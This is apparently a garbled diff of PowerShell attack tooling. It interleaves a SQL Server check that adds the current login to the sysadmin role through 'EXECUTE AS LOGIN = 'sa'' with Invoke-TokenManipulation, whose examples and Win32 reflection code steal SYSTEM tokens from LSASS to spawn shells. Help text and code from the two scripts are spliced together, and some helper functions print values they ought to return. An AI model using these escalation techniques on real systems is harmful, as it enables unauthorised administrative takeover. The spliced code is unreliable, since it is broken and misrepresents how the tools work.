System.Diagnostics.Process object to the pipeline. + + +.EXAMPLE + +Invoke-TokenManipulation -Enumerate + +Lists all unique usable tokens on the computer. + +.EXAMPLE + +Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system" + +Spawns cmd.exe as SYSTEM. + +.EXAMPLE + +Invoke-TokenManipulation -ImpersonateUser -Username "nt authority\system" + +Makes the current PowerShell thread impersonate SYSTEM. + +.EXAMPLE + +Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500 + +Spawns cmd.exe using the primary token belonging to process ID 500. + +.EXAMPLE + +Invoke-TokenManipulation -ShowAll + +Lists all tokens available on the computer, including non-unique tokens and tokens created using NetworkLogon. + +.EXAMPLE + +Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 500 + +Spawns cmd.exe using the token belonging to thread ID 500. + +.EXAMPLE + +Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe" - # Iterate through each current login and their associated roles - $CurrentPrincpalList| - ForEach-Object -Process { - # Check if login or role has the DB_DDLADMIN roles in any databases - $DBDDLADMIN = Get-SQLDatabaseRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -RolePrincipalName DB_DDLADMIN -PrincipalName $_ -SuppressVerbose +Spawns cmd.exe using the primary token of LSASS.exe. This pipes the output of Get-Process to the "-Process" parameter of the script. - # ----------------------------------------------------------------- - # Check for exploit dependancies - # Note: Typically secondary configs required for dba/os execution - # ----------------------------------------------------------------- +.EXAMPLE - # Check for db ownerships - if($DBDDLADMIN) - { - # Add an entry for each database where the user has the DB_DDLADMIN role - $DBDDLADMIN| - ForEach-Object -Process { - $DatabaseTarget = $_.DatabaseName - $PrincipalTarget = $_.PrincipalName +(Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe" -PassThru).WaitForExit() - Write-Verbose -Message "$Instance : - $PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database." - $IsVulnerable = 'Yes' +Spawns cmd.exe using the primary token of LSASS.exe. Then holds the spawning PowerShell session until that process has exited. - # Check if associated database is trusted and the owner is a sysadmin - $Depends = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseTarget -SuppressVerbose | Where-Object -FilterScript { - $_.is_trustworthy_on -eq 1 -and $_.OwnerIsSysadmin -eq 1 - } +.EXAMPLE - if($Depends) - { - $IsExploitable = 'No' - Write-Verbose -Message "$Instance : - The $DatabaseTarget database is set as trustworthy and is owned by a sysadmin. This is exploitable." +Get-Process wininit | Invoke-TokenManipulation -ImpersonateUser - # ----------------------------------------------------------------- - # Exploit Vulnerability - # Note: Add the current user to sysadmin fixed server role - # ----------------------------------------------------------------- - if($Exploit) - { - # Check if user is already a sysadmin - $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status - if($SysadminPreCheck -eq 0) - { - # Status user - Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin." - Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role by using DB_OWNER permissions..." +Makes the current thread impersonate the lsass security token. - # Attempt to add the current login to sysadmins fixed server role - $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin';Revert" -SuppressVerbose +.NOTES +This script was inspired by incognito. - # Verify the login was added successfully - $SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status - if($SysadminPostCheck -eq 1) - { - Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!" - $Exploited = 'Yes' - } - else - { +Several of the functions used in this script were written by Matt Graeber(Twitter: @mattifestation, Blog: http://www.exploit-monday.com/). +BIG THANKS to Matt Graeber for helping debug. - } - } - else - { - Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin." - } +.LINK - #Add record - $Details = "$PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database." - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) - } - else - { - #Add record - $Details = "$PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database." - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) - } - } - else - { - #Add record - Write-Verbose -Message "$Instance : - The $DatabaseTarget is not exploitable." - $Details = "$PrincipalTarget has the DB_DDLADMIN role in the $DatabaseTarget database, but this was not exploitable." - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) - } - } - } - } +Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell +Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/ - # Status User - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_DDLADMIN" +#> + + [CmdletBinding(DefaultParameterSetName="Enumerate")] + Param( + [Parameter(ParameterSetName = "Enumerate")] + [Switch] + $Enumerate, + + [Parameter(ParameterSetName = "RevToSelf")] + [Switch] + $RevToSelf, + + [Parameter(ParameterSetName = "ShowAll")] + [Switch] + $ShowAll, + + [Parameter(ParameterSetName = "ImpersonateUser")] + [Switch] + $ImpersonateUser, + + [Parameter(ParameterSetName = "CreateProcess")] + [String] + $CreateProcess, + + [Parameter(ParameterSetName = "WhoAmI")] + [Switch] + $WhoAmI, + + [Parameter(ParameterSetName = "ImpersonateUser")] + [Parameter(ParameterSetName = "CreateProcess")] + [String] + $Username, + + [Parameter(ParameterSetName = "ImpersonateUser")] + [Parameter(ParameterSetName = "CreateProcess")] + [Int] + $ProcessId, + + [Parameter(ParameterSetName = "ImpersonateUser", ValueFromPipeline=$true)] + [Parameter(ParameterSetName = "CreateProcess", ValueFromPipeline=$true)] + [System.Diagnostics.Process] + $Process, + + [Parameter(ParameterSetName = "ImpersonateUser")] + [Parameter(ParameterSetName = "CreateProcess")] + $ThreadId, + + [Parameter(ParameterSetName = "CreateProcess")] + [String] + $ProcessArgs, + + [Parameter(ParameterSetName = "CreateProcess")] + [Switch] + $NoUI, + + [Parameter(ParameterSetName = "CreateProcess")] + [Switch] + $PassThru, + + [Parameter(Mandatory = $false,ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance + ) + + Set-StrictMode -Version 2 + + #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ + Function Get-DelegateType + { + Param + ( + [OutputType([Type])] + + [Parameter( Position = 0)] + [Type[]] + $Parameters = (New-Object Type[](0)), + + [Parameter( Position = 1 )] + [Type] + $ReturnType = [Void] + ) + + $Domain = [AppDomain]::CurrentDomain + $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') + $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) + $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) + $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) + $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') + $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) + $MethodBuilder.SetImplementationFlags('Runtime, Managed') + + Write-Host $TypeBuilder.CreateType() + } + + + #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ + Function Get-ProcAddress + { + Param + ( + [OutputType([IntPtr])] + + [Parameter( Position = 0, Mandatory = $True )] + [String] + $Module, + + [Parameter( Position = 1, Mandatory = $True )] + [String] + $Procedure + ) + + # Get a reference to System.dll in the GAC + $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | + Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } + $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') + # Get a reference to the GetModuleHandle and GetProcAddress methods + $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') + $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') + # Get a handle to the module specified + $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) + $tmpPtr = New-Object IntPtr + $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) + + # Return the address of the function + Write-Host $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) + } + + ############################### + #Win32Constants + ############################### + $Constants = @{ + ACCESS_SYSTEM_SECURITY = 0x01000000 + READ_CONTROL = 0x00020000 + SYNCHRONIZE = 0x00100000 + STANDARD_RIGHTS_ALL = 0x001F0000 + TOKEN_QUERY = 8 + TOKEN_ADJUST_PRIVILEGES = 0x20 + ERROR_NO_TOKEN = 0x3f0 + SECURITY_DELEGATION = 3 + DACL_SECURITY_INFORMATION = 0x4 + ACCESS_ALLOWED_ACE_TYPE = 0x0 + STANDARD_RIGHTS_REQUIRED = 0x000F0000 + DESKTOP_GENERIC_ALL = 0x000F01FF + WRITE_DAC = 0x00040000 + OBJECT_INHERIT_ACE = 0x1 + GRANT_ACCESS = 0x1 + TRUSTEE_IS_NAME = 0x1 + TRUSTEE_IS_SID = 0x0 + TRUSTEE_IS_USER = 0x1 + TRUSTEE_IS_WELL_KNOWN_GROUP = 0x5 + TRUSTEE_IS_GROUP = 0x2 + PROCESS_QUERY_INFORMATION = 0x400 + TOKEN_ASSIGN_PRIMARY = 0x1 + TOKEN_DUPLICATE = 0x2 + TOKEN_IMPERSONATE = 0x4 + TOKEN_QUERY_SOURCE = 0x10 + STANDARD_RIGHTS_READ = 0x20000 + TokenStatistics = 10 + TOKEN_ALL_ACCESS = 0xf01ff + MAXIMUM_ALLOWED = 0x02000000 + THREAD_ALL_ACCESS = 0x1f03ff + ERROR_INVALID_PARAMETER = 0x57 + LOGON_NETCREDENTIALS_ONLY = 0x2 + SE_PRIVILEGE_ENABLED = 0x2 + SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x1 + SE_PRIVILEGE_REMOVED = 0x4 } - End + $Win32Constants = New-Object PSObject -Property $Constants + ############################### + + + ############################### + #Win32Structures + ############################### + #Define all the structures/enums that will be used + # This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html + $Domain = [AppDomain]::CurrentDomain + $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly') + $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false) + $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] + + #ENUMs + $TypeBuilder = $ModuleBuilder.DefineEnum('TOKEN_INFORMATION_CLASS', 'Public', [UInt32]) + $TypeBuilder.DefineLiteral('TokenUser', [UInt32] 1) | Out-Null + $TypeBuilder.DefineLiteral('TokenGroups', [UInt32] 2) | Out-Null + $TypeBuilder.DefineLiteral('TokenPrivileges', [UInt32] 3) | Out-Null + $TypeBuilder.DefineLiteral('TokenOwner', [UInt32] 4) | Out-Null + $TypeBuilder.DefineLiteral('TokenPrimaryGroup', [UInt32] 5) | Out-Null + $TypeBuilder.DefineLiteral('TokenDefaultDacl', [UInt32] 6) | Out-Null + $TypeBuilder.DefineLiteral('TokenSource', [UInt32] 7) | Out-Null + $TypeBuilder.DefineLiteral('TokenType', [UInt32] 8) | Out-Null + $TypeBuilder.DefineLiteral('TokenImpersonationLevel', [UInt32] 9) | Out-Null + $TypeBuilder.DefineLiteral('TokenStatistics', [UInt32] 10) | Out-Null + $TypeBuilder.DefineLiteral('TokenRestrictedSids', [UInt32] 11) | Out-Null + $TypeBuilder.DefineLiteral('TokenSessionId', [UInt32] 12) | Out-Null + $TypeBuilder.DefineLiteral('TokenGroupsAndPrivileges', [UInt32] 13) | Out-Null + $TypeBuilder.DefineLiteral('TokenSessionReference', [UInt32] 14) | Out-Null + $TypeBuilder.DefineLiteral('TokenSandBoxInert', [UInt32] 15) | Out-Null + $TypeBuilder.DefineLiteral('TokenAuditPolicy', [UInt32] 16) | Out-Null + $TypeBuilder.DefineLiteral('TokenOrigin', [UInt32] 17) | Out-Null + $TypeBuilder.DefineLiteral('TokenElevationType', [UInt32] 18) | Out-Null + $TypeBuilder.DefineLiteral('TokenLinkedToken', [UInt32] 19) | Out-Null + $TypeBuilder.DefineLiteral('TokenElevation', [UInt32] 20) | Out-Null + $TypeBuilder.DefineLiteral('TokenHasRestrictions', [UInt32] 21) | Out-Null + $TypeBuilder.DefineLiteral('TokenAccessInformation', [UInt32] 22) | Out-Null + $TypeBuilder.DefineLiteral('TokenVirtualizationAllowed', [UInt32] 23) | Out-Null + $TypeBuilder.DefineLiteral('TokenVirtualizationEnabled', [UInt32] 24) | Out-Null + $TypeBuilder.DefineLiteral('TokenIntegrityLevel', [UInt32] 25) | Out-Null + $TypeBuilder.DefineLiteral('TokenUIAccess', [UInt32] 26) | Out-Null + $TypeBuilder.DefineLiteral('TokenMandatoryPolicy', [UInt32] 27) | Out-Null + $TypeBuilder.DefineLiteral('TokenLogonSid', [UInt32] 28) | Out-Null + $TypeBuilder.DefineLiteral('TokenIsAppContainer', [UInt32] 29) | Out-Null + $TypeBuilder.DefineLiteral('TokenCapabilities', [UInt32] 30) | Out-Null + $TypeBuilder.DefineLiteral('TokenAppContainerSid', [UInt32] 31) | Out-Null + $TypeBuilder.DefineLiteral('TokenAppContainerNumber', [UInt32] 32) | Out-Null + $TypeBuilder.DefineLiteral('TokenUserClaimAttributes', [UInt32] 33) | Out-Null + $TypeBuilder.DefineLiteral('TokenDeviceClaimAttributes', [UInt32] 34) | Out-Null + $TypeBuilder.DefineLiteral('TokenRestrictedUserClaimAttributes', [UInt32] 35) | Out-Null + $TypeBuilder.DefineLiteral('TokenRestrictedDeviceClaimAttributes', [UInt32] 36) | Out-Null + $TypeBuilder.DefineLiteral('TokenDeviceGroups', [UInt32] 37) | Out-Null + $TypeBuilder.DefineLiteral('TokenRestrictedDeviceGroups', [UInt32] 38) | Out-Null + $TypeBuilder.DefineLiteral('TokenSecurityAttributes', [UInt32] 39) | Out-Null + $TypeBuilder.DefineLiteral('TokenIsRestricted', [UInt32] 40) | Out-Null + $TypeBuilder.DefineLiteral('MaxTokenInfoClass', [UInt32] 41) | Out-Null + $TOKEN_INFORMATION_CLASS = $TypeBuilder.CreateType() + + #STRUCTs + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('LARGE_INTEGER', $Attributes, [System.ValueType], 8) + $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null + $LARGE_INTEGER = $TypeBuilder.CreateType() + + #Struct LUID + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8) + $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('HighPart', [Int32], 'Public') | Out-Null + $LUID = $TypeBuilder.CreateType() + + #Struct TOKEN_STATISTICS + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_STATISTICS', $Attributes, [System.ValueType]) + $TypeBuilder.DefineField('TokenId', $LUID, 'Public') | Out-Null + $TypeBuilder.DefineField('AuthenticationId', $LUID, 'Public') | Out-Null + $TypeBuilder.DefineField('ExpirationTime', $LARGE_INTEGER, 'Public') | Out-Null + $TypeBuilder.DefineField('TokenType', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('ImpersonationLevel', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('DynamicCharged', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('DynamicAvailable', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('GroupCount', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('ModifiedId', $LUID, 'Public') | Out-Null + $TOKEN_STATISTICS = $TypeBuilder.CreateType() + + #Struct LSA_UNICODE_STRING + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('LSA_UNICODE_STRING', $Attributes, [System.ValueType]) + $TypeBuilder.DefineField('Length', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('MaximumLength', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('Buffer', [IntPtr], 'Public') | Out-Null + $LSA_UNICODE_STRING = $TypeBuilder.CreateType() + + #Struct LSA_LAST_INTER_LOGON_INFO + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('LSA_LAST_INTER_LOGON_INFO', $Attributes, [System.ValueType]) + $TypeBuilder.DefineField('LastSuccessfulLogon', $LARGE_INTEGER, 'Public') | Out-Null + $TypeBuilder.DefineField('LastFailedLogon', $LARGE_INTEGER, 'Public') | Out-Null + $TypeBuilder.DefineField('FailedAttemptCountSinceLastSuccessfulLogon', [UInt32], 'Public') | Out-Null + $LSA_LAST_INTER_LOGON_INFO = $TypeBuilder.CreateType() + + #Struct SECURITY_LOGON_SESSION_DATA + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('SECURITY_LOGON_SESSION_DATA', $Attributes, [System.ValueType]) + $TypeBuilder.DefineField('Size', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('LoginID', $LUID, 'Public') | Out-Null + $TypeBuilder.DefineField('Username', $LSA_UNICODE_STRING, 'Public') | Out-Null + $TypeBuilder.DefineField('LoginDomain', $LSA_UNICODE_STRING, 'Public') | Out-Null + $TypeBuilder.DefineField('AuthenticationPackage', $LSA_UNICODE_STRING, 'Public') | Out-Null + $TypeBuilder.DefineField('LogonType', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('Session', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('Sid', [IntPtr], 'Public') | Out-Null + $TypeBuilder.DefineField('LoginTime', $LARGE_INTEGER, 'Public') | Out-Null + $TypeBuilder.DefineField('LoginServer', $LSA_UNICODE_STRING, 'Public') | Out-Null + $TypeBuilder.DefineField('DnsDomainName', $LSA_UNICODE_STRING, 'Public') | Out-Null + $TypeBuilder.DefineField('Upn', $LSA_UNICODE_STRING, 'Public') | Out-Null + $TypeBuilder.DefineField('UserFlags', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('LastLogonInfo', $LSA_LAST_INTER_LOGON_INFO, 'Public') | Out-Null + $TypeBuilder.DefineField('LogonScript', $LSA_UNICODE_STRING, 'Public') | Out-Null + $TypeBuilder.DefineField('ProfilePath', $LSA_UNICODE_STRING, 'Public') | Out-Null + $TypeBuilder.DefineField('HomeDirectory', $LSA_UNICODE_STRING, 'Public') | Out-Null + $TypeBuilder.DefineField('HomeDirectoryDrive', $LSA_UNICODE_STRING, 'Public') | Out-Null + $TypeBuilder.DefineField('LogoffTime', $LARGE_INTEGER, 'Public') | Out-Null + $TypeBuilder.DefineField('KickOffTime', $LARGE_INTEGER, 'Public') | Out-Null + $TypeBuilder.DefineField('PasswordLastSet', $LARGE_INTEGER, 'Public') | Out-Null + $TypeBuilder.DefineField('PasswordCanChange', $LARGE_INTEGER, 'Public') | Out-Null + $TypeBuilder.DefineField('PasswordMustChange', $LARGE_INTEGER, 'Public') | Out-Null + $SECURITY_LOGON_SESSION_DATA = $TypeBuilder.CreateType() + + #Struct STARTUPINFO + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('STARTUPINFO', $Attributes, [System.ValueType]) + $TypeBuilder.DefineField('cb', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('lpReserved', [IntPtr], 'Public') | Out-Null + $TypeBuilder.DefineField('lpDesktop', [IntPtr], 'Public') | Out-Null + $TypeBuilder.DefineField('lpTitle', [IntPtr], 'Public') | Out-Null + $TypeBuilder.DefineField('dwX', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('dwY', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('dwXSize', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('dwYSize', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('dwXCountChars', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('dwYCountChars', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('dwFillAttribute', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('wShowWindow', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('cbReserved2', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('lpReserved2', [IntPtr], 'Public') | Out-Null + $TypeBuilder.DefineField('hStdInput', [IntPtr], 'Public') | Out-Null + $TypeBuilder.DefineField('hStdOutput', [IntPtr], 'Public') | Out-Null + $TypeBuilder.DefineField('hStdError', [IntPtr], 'Public') | Out-Null + $STARTUPINFO = $TypeBuilder.CreateType() + + #Struct PROCESS_INFORMATION + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('PROCESS_INFORMATION', $Attributes, [System.ValueType]) + $TypeBuilder.DefineField('hProcess', [IntPtr], 'Public') | Out-Null + $TypeBuilder.DefineField('hThread', [IntPtr], 'Public') | Out-Null + $TypeBuilder.DefineField('dwProcessId', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('dwThreadId', [UInt32], 'Public') | Out-Null + $PROCESS_INFORMATION = $TypeBuilder.CreateType() + + #Struct TOKEN_ELEVATION + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_ELEVATION', $Attributes, [System.ValueType]) + $TypeBuilder.DefineField('TokenIsElevated', [UInt32], 'Public') | Out-Null + $TOKEN_ELEVATION = $TypeBuilder.CreateType() + + #Struct LUID_AND_ATTRIBUTES + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12) + $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null + $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null + $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType() + + #Struct TOKEN_PRIVILEGES + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16) + $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null + $TOKEN_PRIVILEGES = $TypeBuilder.CreateType() + + #Struct ACE_HEADER + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('ACE_HEADER', $Attributes, [System.ValueType]) + $TypeBuilder.DefineField('AceType', [Byte], 'Public') | Out-Null + $TypeBuilder.DefineField('AceFlags', [Byte], 'Public') | Out-Null + $TypeBuilder.DefineField('AceSize', [UInt16], 'Public') | Out-Null + $ACE_HEADER = $TypeBuilder.CreateType() + + #Struct ACL + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('ACL', $Attributes, [System.ValueType]) + $TypeBuilder.DefineField('AclRevision', [Byte], 'Public') | Out-Null + $TypeBuilder.DefineField('Sbz1', [Byte], 'Public') | Out-Null + $TypeBuilder.DefineField('AclSize', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('AceCount', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('Sbz2', [UInt16], 'Public') | Out-Null + $ACL = $TypeBuilder.CreateType() + + #Struct ACE_HEADER + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('ACCESS_ALLOWED_ACE', $Attributes, [System.ValueType]) + $TypeBuilder.DefineField('Header', $ACE_HEADER, 'Public') | Out-Null + $TypeBuilder.DefineField('Mask', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('SidStart', [UInt32], 'Public') | Out-Null + $ACCESS_ALLOWED_ACE = $TypeBuilder.CreateType() + + #Struct TRUSTEE + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('TRUSTEE', $Attributes, [System.ValueType]) + $TypeBuilder.DefineField('pMultipleTrustee', [IntPtr], 'Public') | Out-Null + $TypeBuilder.DefineField('MultipleTrusteeOperation', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('TrusteeForm', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('TrusteeType', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('ptstrName', [IntPtr], 'Public') | Out-Null + $TRUSTEE = $TypeBuilder.CreateType() + + #Struct EXPLICIT_ACCESS + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('EXPLICIT_ACCESS', $Attributes, [System.ValueType]) + $TypeBuilder.DefineField('grfAccessPermissions', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('grfAccessMode', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('grfInheritance', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('Trustee', $TRUSTEE, 'Public') | Out-Null + $EXPLICIT_ACCESS = $TypeBuilder.CreateType() + ############################### + + + ############################### + #Win32Functions + ############################### + $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess + $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) + $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate) + + $OpenProcessTokenAddr = Get-ProcAddress advapi32.dll OpenProcessToken + $OpenProcessTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([Bool]) + $OpenProcessToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessTokenAddr, $OpenProcessTokenDelegate) + + $GetTokenInformationAddr = Get-ProcAddress advapi32.dll GetTokenInformation + $GetTokenInformationDelegate = Get-DelegateType @([IntPtr], $TOKEN_INFORMATION_CLASS, [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]) + $GetTokenInformation = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetTokenInformationAddr, $GetTokenInformationDelegate) + + $SetThreadTokenAddr = Get-ProcAddress advapi32.dll SetThreadToken + $SetThreadTokenDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([Bool]) + $SetThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetThreadTokenAddr, $SetThreadTokenDelegate) + + $ImpersonateLoggedOnUserAddr = Get-ProcAddress advapi32.dll ImpersonateLoggedOnUser + $ImpersonateLoggedOnUserDelegate = Get-DelegateType @([IntPtr]) ([Bool]) + $ImpersonateLoggedOnUser = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateLoggedOnUserAddr, $ImpersonateLoggedOnUserDelegate) + + $RevertToSelfAddr = Get-ProcAddress advapi32.dll RevertToSelf + $RevertToSelfDelegate = Get-DelegateType @() ([Bool]) + $RevertToSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RevertToSelfAddr, $RevertToSelfDelegate) + + $LsaGetLogonSessionDataAddr = Get-ProcAddress secur32.dll LsaGetLogonSessionData + $LsaGetLogonSessionDataDelegate = 